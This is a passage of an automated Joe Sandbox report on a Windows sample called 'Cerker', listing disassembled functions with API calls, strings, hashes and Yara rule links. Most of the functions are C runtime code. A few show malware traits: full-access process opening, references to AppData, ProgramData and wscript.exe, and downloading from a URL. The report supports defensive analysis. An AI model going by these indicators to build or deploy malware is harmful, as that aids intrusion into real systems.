API ID: Internet$CloseHandle$FileOpenRead
String ID: ""~|fP$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
API String ID: 3539267403-4122022229
Opcode ID: c4c44882417a8deb653843b8bbacc4e3858e3ed428b42c5823914badb65f85a8
Instruction ID: 31c6b3fde743c9ca5d9a637079c56586d81955a048c0527a9a8dc687d0f74ff2
Opcode Fuzzy Hash: c4c44882417a8deb653843b8bbacc4e3858e3ed428b42c5823914badb65f85a8
Instruction Fuzzy Hash: 20B1B471D102489ADB06DB78D845BE9B3B8FF69345F14836AFA05F6191EB70AAC1CA40

Function 008E764A Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008E76B9
_free.LIBCMT ref: 008E76CF
_free.LIBCMT ref: 008E76E2
_free.LIBCMT ref: 008E76F7
_free.LIBCMT ref: 008E770C
GetCPInfo.KERNEL32(?,?), ref: 008E7756

Part of subcall function 008F13AA: _free.LIBCMT ref: 008F1415

_free.LIBCMT ref: 008E79C1
_free.LIBCMT ref: 008E79D4
_free.LIBCMT ref: 008E79E2
_free.LIBCMT ref: 008E79ED
_free.LIBCMT ref: 008E7A2F
_free.LIBCMT ref: 008E7A37
_free.LIBCMT ref: 008E7A3D
_free.LIBCMT ref: 008E7A45
_free.LIBCMT ref: 008E7A53

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a084fbe33677dd2e788cc2d0fd9ce7490a3c2d7b550c94169097d321968c374c
Instruction ID: ab81b88cdc49a0c71cfa83a9f503cd3790849e969211629e4e0416ff9625aafc
Opcode Fuzzy Hash: a084fbe33677dd2e788cc2d0fd9ce7490a3c2d7b550c94169097d321968c374c
Instruction Fuzzy Hash: 87D19971D043899FDB119FBAC881BAEBBB5FF0A300F144129E599E7282DB75A941CB50

Function 008C13C0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 332COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?), ref: 008C13DD
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104,?,?), ref: 008C13FB
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?), ref: 008C1405
GetCurrentProcessId.KERNEL32(?,?,00000000,00000000,?,00000104,?,?), ref: 008C144A
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 008C1455
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 008C175F

Strings

C:\ProgramData, xrefs: 008C16A2
wscript.exe, xrefs: 008C15A2
LOCALAPPDATA, xrefs: 008C14DD
USERPROFILE, xrefs: 008C1522
C:\Windows\Microsoft.NET, xrefs: 008C1632
APPDATA, xrefs: 008C1497

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: CloseHandle$Process$CurrentFileModuleNameOpen
String ID: APPDATA$C:\ProgramData$C:\Windows\Microsoft.NET$LOCALAPPDATA$USERPROFILE$wscript.exe
API String ID: 1772831937-2916873119
Opcode ID: 2e9f4e6c0c471e40a96c1a6fae7b19a748c8be137d0ad74f1ec22c98ce497de5
Instruction ID: a4fc09b758370572a972337477364dec5bbf1f8f03428a13172eb1720f024e57
Opcode Fuzzy Hash: 2e9f4e6c0c471e40a96c1a6fae7b19a748c8be137d0ad74f1ec22c98ce497de5
Instruction Fuzzy Hash: 32B10072E002089BDF10DA68CCC8FBEB77AFB52360F544268E916E7287D735E9468751

Function 008F5B88 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 008F5BCC

Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4E51
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4E63
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4E75
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4E87
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4E99
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4EAB
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4EBD
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4ECF
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4EE1
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4EF3
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4F05
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4F17
Part of subcall function 008F4E34: _free.LIBCMT ref: 008F4F29

_free.LIBCMT ref: 008F5BC1

Part of subcall function 008EBF97: HeapFree.KERNEL32(00000000,00000000,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?), ref: 008EBFAD
Part of subcall function 008EBF97: GetLastError.KERNEL32(?,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?,?), ref: 008EBFBF

_free.LIBCMT ref: 008F5BE3
_free.LIBCMT ref: 008F5BF8
_free.LIBCMT ref: 008F5C03
_free.LIBCMT ref: 008F5C25
_free.LIBCMT ref: 008F5C38
_free.LIBCMT ref: 008F5C46
_free.LIBCMT ref: 008F5C51
_free.LIBCMT ref: 008F5C89
_free.LIBCMT ref: 008F5C90
_free.LIBCMT ref: 008F5CAD
_free.LIBCMT ref: 008F5CC5

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 27a2f2e803fc6325a648ff42d81624c55f3cc48ddf234be16714e6d128abf10f
Instruction ID: d195a10eb076d667d1ca98601d224daa57785b2ed682e6900dc3f138859c7011
Opcode Fuzzy Hash: 27a2f2e803fc6325a648ff42d81624c55f3cc48ddf234be16714e6d128abf10f
Instruction Fuzzy Hash: DD314B32A04B499FEB21AAB9DC45B677BE8FF01310F144819E39AD7191DF31AD80CB21

Function 008CB570 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008CB585
std::_Lockit::_Lockit.LIBCPMT ref: 008CB5A0
std::_Lockit::~_Lockit.LIBCPMT ref: 008CB5C0
std::_Lockit::~_Lockit.LIBCPMT ref: 008CB611
std::_Facet_Register.LIBCPMT ref: 008CB707
std::_Lockit::~_Lockit.LIBCPMT ref: 008CB71F
Concurrency::cancel_current_task.LIBCPMT ref: 008CB72D
Concurrency::cancel_current_task.LIBCPMT ref: 008CB732
Concurrency::cancel_current_task.LIBCPMT ref: 008CB737

Strings

true, xrefs: 008CB6D8
false, xrefs: 008CB6B2

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_taskLockit::~_$Lockit::_$Facet_Register
String ID: false$true
API String ID: 1941589060-2658103896
Opcode ID: 27db3fe3722050ea8ab1a3a2a55353dc430bf2e8ebee9b1fbe0273081568241f
Instruction ID: 40afec1d1da3604ccb2f6f5bed248479fb77254326bc3b24d308ca36bc0a3c67
Opcode Fuzzy Hash: 27db3fe3722050ea8ab1a3a2a55353dc430bf2e8ebee9b1fbe0273081568241f
Instruction Fuzzy Hash: CF519175A006148FCB24EF68E852EA9B7B1FF54314F04416EE909DB352EB31EE01CB82

Function 008F4F32 Relevance: 18.4, APIs: 12, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F4F7A
_free.LIBCMT ref: 008F4F9E
_free.LIBCMT ref: 008F4FAB
_free.LIBCMT ref: 008F4FD0
_free.LIBCMT ref: 008F4FDD
_free.LIBCMT ref: 008F4FE6
_free.LIBCMT ref: 008F52C0
_free.LIBCMT ref: 008F52C8

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 58832c017ea78dd3b92e2daf748146dd8e8cc2da5abc318053a84c5e6da92c54
Instruction ID: 4571be309fc159e0842fb849e9bf4df873e0ab9eacc9d615ab77774ba0bca29d
Opcode Fuzzy Hash: 58832c017ea78dd3b92e2daf748146dd8e8cc2da5abc318053a84c5e6da92c54
Instruction Fuzzy Hash: EBC14176E40209AFDB20DBA8DC46FAF77F8FB09710F144165FB05EB286DA7099418B61

Function 008E2E28 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 008E2F25
type_info::operator==.LIBVCRUNTIME ref: 008E2F47
___TypeMatch.LIBVCRUNTIME ref: 008E3056
IsInExceptionSpec.LIBVCRUNTIME ref: 008E3128
_UnwindNestedFrames.LIBCMT ref: 008E31AC
CallUnexpected.LIBVCRUNTIME ref: 008E31C7

Strings

csm, xrefs: 008E2E65
csm, xrefs: 008E2ED2
csm, xrefs: 008E2F7E

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f2eeca3743c798797e9e9012656a8875ee50dd120a18d5ecead5224ebdb8efed
Instruction ID: 81dab4718b4e82fc0e8001466f510f0bd59b1911272c9158057d60fcfcd5a1be
Opcode Fuzzy Hash: f2eeca3743c798797e9e9012656a8875ee50dd120a18d5ecead5224ebdb8efed
Instruction Fuzzy Hash: A4B17D71800299EFCF29DF9AC8859AEB7B9FF16310F144169F811AB212D731DE51CB92

Function 008C56B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C56F1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 008C575B
InternetCloseHandle.WININET(00000000), ref: 008C5768
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 008C57C9
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 008C57FB
InternetCloseHandle.WININET(00000000), ref: 008C580C
InternetCloseHandle.WININET(00000000), ref: 008C580F

Strings

Couldn't open Internet!, xrefs: 008C584F
Couldn't open URL!, xrefs: 008C576E

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Internet$CloseHandle$FileOpenRead
String ID: Couldn't open Internet!$Couldn't open URL!
API String ID: 3539267403-1021515825
Opcode ID: bf3ecde0fd07248a429e89a186eebf42295b892c885a4d68e1329b4eb016abfc
Instruction ID: d3fc8e09027735c52e746bb17e722b65438d0e04fce3fc3720667681217bcce4
Opcode Fuzzy Hash: bf3ecde0fd07248a429e89a186eebf42295b892c885a4d68e1329b4eb016abfc
Instruction Fuzzy Hash: 5F515271A00209ABDF149FA4CC45FAFBB79FF44315F108129FA05E6281D778EA84CBA1

Function 008EBAD8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008EBAEE

Part of subcall function 008EBF97: HeapFree.KERNEL32(00000000,00000000,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?), ref: 008EBFAD
Part of subcall function 008EBF97: GetLastError.KERNEL32(?,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?,?), ref: 008EBFBF

_free.LIBCMT ref: 008EBAFA
_free.LIBCMT ref: 008EBB05
_free.LIBCMT ref: 008EBB10
_free.LIBCMT ref: 008EBB1B
_free.LIBCMT ref: 008EBB26
_free.LIBCMT ref: 008EBB31
_free.LIBCMT ref: 008EBB3C
_free.LIBCMT ref: 008EBB47
_free.LIBCMT ref: 008EBB55

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 147d228cac1b75d3c3087bb95f90c40fee4199fe85c05c6c24b24a229daf2cf6
Instruction ID: 0002650d2729db92c88b9442746fb90ddbd89b0bb330525410889d61683c0d61
Opcode Fuzzy Hash: 147d228cac1b75d3c3087bb95f90c40fee4199fe85c05c6c24b24a229daf2cf6
Instruction Fuzzy Hash: BC216276900248AFCB41EF99C881DDE7FB9FF09344B0045A6B615DB522EB31EA54CF81

Function 008CBA60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 008CBA77

Part of subcall function 008DE8C0: std::_Lockit::_Lockit.LIBCPMT ref: 008DE8D2
Part of subcall function 008DE8C0: std::locale::_Setgloballocale.LIBCPMT ref: 008DE8ED
Part of subcall function 008DE8C0: _Yarn.LIBCPMT ref: 008DE903
Part of subcall function 008DE8C0: std::_Lockit::~_Lockit.LIBCPMT ref: 008DE943

std::_Lockit::_Lockit.LIBCPMT ref: 008CBA8C
std::_Lockit::_Lockit.LIBCPMT ref: 008CBAA7
std::_Lockit::~_Lockit.LIBCPMT ref: 008CBAC7
__Getcoll.LIBCPMT ref: 008CBB4A
std::_Facet_Register.LIBCPMT ref: 008CBB7C
std::_Lockit::~_Lockit.LIBCPMT ref: 008CBB94

Strings

ios_base::badbit set, xrefs: 008CBA67

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Facet_GetcollInitRegisterSetgloballocaleYarn
String ID: ios_base::badbit set
API String ID: 1067193257-3882152299
Opcode ID: 50b9adc95e688cc9baa9c4ff3ad769737a9cf4749b11114dffa9335a4734c8de
Instruction ID: 84ee6f7c706c9d92b578aac8336441d128c1923888726fee1b1645267a303f89
Opcode Fuzzy Hash: 50b9adc95e688cc9baa9c4ff3ad769737a9cf4749b11114dffa9335a4734c8de
Instruction Fuzzy Hash: 764180719006199FCB24DF68D852AAEB7B4FF10320B14816EE859EB352D731EE05CB92

Function 008EE9AE Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac494e745d92fca5c9034f600156452eeb91f8eecf972a7ad1c89f485f17642
Instruction ID: cfd0d92eb44bf81a4c92fa10a48035f05d8ad90a1396448dc505f6f3524b3e66
Opcode Fuzzy Hash: eac494e745d92fca5c9034f600156452eeb91f8eecf972a7ad1c89f485f17642
Instruction Fuzzy Hash: 1DC1D470E08289AFDB15DFAED880BAD7BB5FF4B304F244059E505E7292CB749942CB61

Function 008F5351 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F53BF
_free.LIBCMT ref: 008F53CB
_free.LIBCMT ref: 008F54F4
_free.LIBCMT ref: 008F54FF

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: be6678bb687ddc64f0fda7fd40477cf4fa7aaf77fee7d93574b294047fd11611
Instruction ID: c50be5beba0260102f5317414ffa5e72334a88521da212aabea08f25ac7e35b3
Opcode Fuzzy Hash: be6678bb687ddc64f0fda7fd40477cf4fa7aaf77fee7d93574b294047fd11611
Instruction Fuzzy Hash: 1761F272904748AFDB20DF78C841BBABBE9FF45710F204429EB55EB281EB709D408B51

Function 008F4682 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 008F46AC
_free.LIBCMT ref: 008F4785
_free.LIBCMT ref: 008F47B2

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 75d18656dccea27a0b066fd8e59a903240a1fe70a91177e359585f7d6e7f2fb3
Instruction ID: 9493139318a70c004b2ff2fb1c222eb89fecd3d055a9d2af373bb2487e9de810
Opcode Fuzzy Hash: 75d18656dccea27a0b066fd8e59a903240a1fe70a91177e359585f7d6e7f2fb3
Instruction Fuzzy Hash: 4251E671D1438D6EEB20AFB8D841A7F7BA4FF02750B14417BEB10D7192EBB589408B51

Function 008EA219 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008EBBF0: GetLastError.KERNEL32(008C1920,00000001,008C1924,008E5E6D,00000001,00000000,00000000,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBBF5
Part of subcall function 008EBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBC93

_free.LIBCMT ref: 008EA504
_free.LIBCMT ref: 008EA51D
_free.LIBCMT ref: 008EA55B
_free.LIBCMT ref: 008EA564
_free.LIBCMT ref: 008EA570

Strings

C, xrefs: 008EA375

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: e2f021a8304c64e54e4d42fb951c4c23f9e9dab638d1b1798a5fbbd4c01e6c37
Instruction ID: be3d76ba582946c78df95073189cf639bef05cff85c3f75165ba3d42a6a451b9
Opcode Fuzzy Hash: e2f021a8304c64e54e4d42fb951c4c23f9e9dab638d1b1798a5fbbd4c01e6c37
Instruction Fuzzy Hash: 85B19A759012599FDB28DF19C888AADB7B4FF49704F1045AAE909E7390E770BE90CF41

Function 008C1B80 Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008C1B92
std::_Lockit::_Lockit.LIBCPMT ref: 008C1BAD
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1BCD
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1C1E
__Getctype.LIBCPMT ref: 008C1C6D
std::_Facet_Register.LIBCPMT ref: 008C1C93
std::_Lockit::~_Lockit.LIBCPMT ref: 008C1CAB

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_GetctypeRegister
String ID:
API String ID: 2525760861-0
Opcode ID: e220ab041def53e0fbbf4752c793bd6a040d21143822fddcd6a197be768cc738
Instruction ID: ce64071b1b60543834305009b604cfc4f933fc2da95e1196ac5e6bdd501a994d
Opcode Fuzzy Hash: e220ab041def53e0fbbf4752c793bd6a040d21143822fddcd6a197be768cc738
Instruction Fuzzy Hash: B54182719042148FCB24EF58D8D4EAAB3B5FF11760B14416DE945DB352EB30EE41DB81

Function 008F5813 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008F555F: _free.LIBCMT ref: 008F5584

_free.LIBCMT ref: 008F5861

Part of subcall function 008EBF97: HeapFree.KERNEL32(00000000,00000000,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?), ref: 008EBFAD
Part of subcall function 008EBF97: GetLastError.KERNEL32(?,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?,?), ref: 008EBFBF

_free.LIBCMT ref: 008F586C
_free.LIBCMT ref: 008F5877
_free.LIBCMT ref: 008F58CB
_free.LIBCMT ref: 008F58D6
_free.LIBCMT ref: 008F58E1
_free.LIBCMT ref: 008F58EC

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
Instruction ID: 5953efa9a4cdbdb4ad46168116e0aea33d0b4e402bf320df0b08b27d137b0cec
Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
Instruction Fuzzy Hash: 8711FCB1940F48AAD620B7B9CC06FEB7B9DFF09744F404815B39AE6053EF65E5044B92

Function 008ECFB6 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 008ECFFE
__fassign.LIBCMT ref: 008ED1E3
__fassign.LIBCMT ref: 008ED200
WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008ED248
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 008ED288
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 008ED330

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
